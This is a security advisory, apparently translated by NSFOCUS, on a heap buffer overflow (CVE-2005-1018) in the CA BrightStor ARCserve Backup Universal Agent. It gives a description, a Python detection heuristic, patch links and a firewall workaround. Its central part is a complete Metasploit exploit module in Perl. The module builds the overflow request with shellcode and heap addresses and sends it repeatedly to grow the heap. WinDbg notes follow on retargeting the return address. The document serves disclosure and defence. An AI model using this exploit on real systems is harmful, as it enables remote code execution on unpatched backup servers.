CA BrightStor ARCserve Backup UniversalAgent Buffer Overflow Vulnerability

Release date: 2005-04-12
Update date: 2005-04-12

Affected systems:
Computer Associates BrightStor ARCserve Backup v11 (Win32)
Description:
BUGTRAQ ID: 13102
CVE(CAN) ID: CVE-2005-1018

BrightStor ARCserve Backup provides backup and restore protection for Windows, NetWare, Linux and UNIX servers at every tier, and for Windows, Mac OS X, Linux, UNIX, AS/400 and VMS client environments.

The BrightStor software contains a buffer overflow in its implementation; a remote attacker could exploit it to execute arbitrary instructions on the host.

BrightStor uses a network agent to run backups on nodes across the network. If the agent receives a request on its TCP port whose option field is set to 0, 3 or 1000, and a very large string precedes that option field in the packet, an overflow occurs. A remote attacker could exploit this to execute arbitrary instructions on the vulnerable machine or to cause a denial of service.
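As an added detection example (not part of the advisory or of the Metasploit module below), the following Python check classifies a raw request to the agent port by its option field and by how much non-null data precedes it. The 8-byte header length and the option offset of 248 are taken from the exploit module on this page; the fill threshold, the `scan_stream` helper and the sample requests are constructed assumptions.

```python
import struct

HEADER_LEN = 8                    # 8-byte protocol header the module prepends
OPTION_OFFSET = 248               # option field offset inside the request body
TRIGGER_OPTIONS = {0, 3, 1000}    # option values the advisory names as triggers
MIN_FILL = 200                    # constructed threshold for "a very large string"


def classify_agent_request(data: bytes) -> str:
    """Classify one raw TCP payload sent to the Universal Agent port.

    Returns 'short' (too small to carry the option field), 'suspicious'
    (trigger option preceded by a large non-null fill) or 'benign'.
    Heuristic (assumption): a legitimate request does not fill the whole
    region ahead of the option field with non-null bytes.
    """
    body = data[HEADER_LEN:]
    if len(body) < OPTION_OFFSET + 2:
        return "short"
    option = struct.unpack_from("<H", body, OPTION_OFFSET)[0]
    fill = sum(1 for b in body[:OPTION_OFFSET] if b != 0)
    if option in TRIGGER_OPTIONS and fill >= MIN_FILL:
        return "suspicious"
    return "benign"


def scan_stream(payloads) -> list:
    """Return (index, verdict) for each payload flagged in a sequence of requests."""
    return [(i, v) for i, p in enumerate(payloads)
            if (v := classify_agent_request(p)) == "suspicious"]


# Constructed samples (not captured traffic):
HEADER = b"\x00\x00\x00\x00\x03\x20\xa8\x02"
# Same shape as the request in the module on this page: 1024 fill bytes,
# option 1000 at offset 248, no shellcode.
overflow_body = bytearray(b"X" * 1024)
struct.pack_into("<H", overflow_body, OPTION_OFFSET, 1000)
SAMPLE_OVERFLOW = HEADER + bytes(overflow_body)
# A request carrying a trigger option but no large preceding string.
benign_body = bytearray(512)
benign_body[:16] = b"backup-node-01\x00\x00"
struct.pack_into("<H", benign_body, OPTION_OFFSET, 3)
SAMPLE_BENIGN = HEADER + bytes(benign_body)

if __name__ == "__main__":
    for name, sample in (("overflow", SAMPLE_OVERFLOW), ("benign", SAMPLE_BENIGN)):
        print(name, classify_agent_request(sample))
```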

<*Source: iDEFENSE Labs (labs@idefense.com)

  Link:*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users assume all risk!

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::cabrightstor_uniagent;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
    'Name'  => 'CA BrightStor Universal Agent Overflow',
    'Version'  => '$Revision: 1.13 $',
    'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],

    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003', 'winnt' ],
    'Priv'  => 1,

    'AutoOpts'  => { 'EXITFUNC' => 'process' },
    'UserOpts'  =>
      {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 6050],
      },

    'Payload' =>
      {

        # 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
        'Space'     => 164,
        'BadChars'  => "\x00",
        'Keys'      => ['+ws2ord'],
        'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
      },

    'Description'  => Pex::Text::Freeform(qq{
    This module exploits a convoluted heap overflow in the CA
    BrightStor Universal Agent service. Triple userland exception
    results in heap growth and execution of dereferenced function pointer
    at a specified address.
}),

    'Refs'    =>
      [
        ['OSVDB', '15471'],
        ['MIL', '16'],
        ['URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
      ],

    'DefaultTarget'    => 0,
    'Targets' => [
        ['Magic Heap Target #1', 0x01625c44], # far away heap address
      ],

    'Keys'    => ['brightstor'],
  };

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target = $self->Targets->[$target_idx];

    $self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

    # The server reverses four bytes starting at 0xa5
    # my $patchy = join('', reverse(split('',substr($shellcode, 0xa5, 4))));
    # substr($shellcode, 0xa5, 4, $patchy);

    # Create the request
    my $boom = "X" x 1024;

    # Required field to trigger the fault
    substr($boom, 248, 2, pack('v', 1000));

    # The shellcode, limited to 250 bytes (no nulls)
    substr($boom, 256, length($shellcode), $shellcode);

    # This should point to itself
    substr($boom, 576, 4, pack('V', $target->[1]));

    # This points to the code below
    substr($boom, 580, 4, pack('V', $target->[1]+8 ));

    # We have 95 bytes, use it to hop back to shellcode
    substr($boom, 584, 6, "\x68" . pack('V', $target->[1]-320) . "\xc3");

    # Stick the protocol header in front of our request
    $boom = "\x00\x00\x00\x00\x03\x20\xa8\x02".$boom;

    $self->PrintLine("[*] Sending " .length($boom) . " bytes to remote host.");

    # We keep making new connections and triggering the fault until
    # the heap is grown to encompass our known return address. Once
    # this address has been allocated and filled, each subsequent
    # request will result in our shellcode being executed.

    for (1 .. 200) {
        my $s = Msf::Socket::Tcp->new
          (
            'PeerAddr'  => $target_host,
            'PeerPort'  => $target_port,
          );

        if ($s->IsError) {
            $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
            return;
        }

        if ($_ % 10 == 0) {
            $self->PrintLine("[*] Sending request $_ of 200...");
        }

        $s->Send($boom);
        $s->Close;

        # Give the process time to recover from each exception
        select(undef, undef, undef, 0.1);
    }
    return;
}

1;

__END__
012a0d91 8b8e445c0000     mov     ecx,[esi+0x5c44]
012a0d97 83c404           add     esp,0x4
012a0d9a 85c9             test    ecx,ecx
012a0d9c 7407             jz      ntagent+0x20da5 (012a0da5)
012a0d9e 8b11             mov     edx,[ecx]         ds:0023:41327441=???????
012a0da0 6a01             push    0x1
012a0da2 ff5204           call    dword ptr [edx+0x4]

Each request will result in another chunk being allocated, the exception
causes these chunks to never be freed. The large chunk size allows us to
predict the location of our buffer and grow our buffer to where we need it.

If these addresses do not match up, run this exploit, then attach with WinDbg:

> s 0 Lfffffff 0x44 0x5c 0x61 0x01

Figure out the pattern, replace the return address, restart the service,
and run it through again. Only tested on WinXP SP1

011b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011f5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01205c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01225c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01235c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01245c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01255c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01265c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01275c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01285c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01295c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
012a5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
012b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
012c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
012d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
012e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
012f5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01305c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01315c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01525c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01535c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01545c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01555c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01565c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01575c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01585c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01595c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
015a5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
015b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
015c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
015d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
015e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
015f5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01605c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01615c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01625c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01635c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01645c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01655c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01665c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01675c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01685c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01695c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016a5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01725c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
017e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........

Recommendations:
Temporary workaround:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* Deploy a firewall, access control lists or another TCP/UDP restriction mechanism to limit access to the system and the service.

Vendor patch:

Computer Associates
-------------------
The vendor has released upgrade patches that fix this security issue; please download them from the vendor's site:

BrightStor ARCserve Backup r11.1 for Windows (all components):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66526&startsearch=1

BrightStor ARCserve Backup r11.1 Client Agent for Windows only:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66527&startsearch=1

BrightStor ARCserve Backup r11.1 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66534&startsearch=1

BrightStor ARCserve Backup r11.0 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66525&startsearch=1

BrightStor ARCserve Backup r11.0 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66535&startsearch=1

BrightStor ARCserve Backup v9.01 for Windows English (all components):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66528&startsearch=1

BrightStor ARCserve Backup v9.01 for Windows Non-English (all components):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66529&startsearch=1

BrightStor ARCserve Backup v9.01 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66536&startsearch=1

BrightStor ARCserve Backup v9.01 Client Agent for Windows only (English):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66530&startsearch=1

BrightStor ARCserve Backup v9.01 Client Agent for Windows only (Non-English):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66531&startsearch=1

BrightStor Enterprise Backup v10.5 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66524&startsearch=1

BrightStor Enterprise Backup v10.5 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66533&startsearch=1

BrightStor Enterprise Backup v10.0 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66523&startsearch=1

This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.